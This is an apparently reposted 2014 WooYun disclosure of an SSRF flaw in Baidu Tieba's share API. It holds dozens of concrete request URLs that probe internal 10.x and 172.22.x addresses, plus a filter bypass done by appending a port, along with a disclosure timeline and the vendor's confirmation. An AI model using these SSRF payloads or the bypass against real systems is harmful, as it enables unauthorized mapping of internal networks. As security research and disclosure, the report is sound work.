[公开漏洞]内网编织者百度内网手动编织!

来源:WooYun 浏览:764次 时间:2014-07-06
做网站找雨过天晴工作室
内网编织者百度内网手动编织! 相关厂商: 百度 漏洞作者:路人甲 提交时间:2014-05-22 11:41 公开时间:2014-07-06 11:42 漏洞类型:设计缺陷/逻辑错误 危害等级:高 自评Rank:12 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 设计缺陷/边界绕过 设计不当 SSRF 漏洞详情 披露状态:

2014-05-22:细节已通知厂商并且等待厂商处理中
2014-05-22:厂商已经确认,细节仅向厂商公开
2014-06-01:细节向核心白帽子及相关领域专家公开
2014-06-11:细节向普通白帽子公开
2014-06-21:细节向实习白帽子公开
2014-07-06:细节向公众公开

简要描述:

RT!

详细说明:

tieba功能设计缺陷形成SSRF漏洞,造成边界绕过:





http://tieba.baidu.com/f/commit/share/openShareApi?url=http://www.wooyun.org/



1.png





漏洞证明:

至少可以来攻击内网:





之前被人发现的内网ip段都好像加限制:



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.18





1.png









不过,加个端口就简单绕过了(正则没写好?):



1.png







其他随手随机测试的ip及网段:





http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.50.33.43:8080/











http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.78:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.76:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.86:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.104:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.139:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.143:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.145:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.147:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.157:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.158:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.161:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.165:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.196:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.217:80



















http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.168:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.169:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.173:80



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.42.7.187:80







http://172.22.1.*



...



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.1.1



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.1.90



...





http://172.22.2.*



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.2.1





http://172.22.3.*



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.3.1







http://172.22.4.*



http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.4.1







http://172.22.5.*





http://tieba.baidu.com/f/commit/share/openShareApi?url=http://172.22.7.1







10.png







11.png







12.png





13.png





14.png







15.png









这样一个SSRF就让内网结构一目了然了!









修复方案:

至少限制内网请求!

版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-22 12:10

厂商回复:

感谢对百度安全的支持。

最新状态:

暂无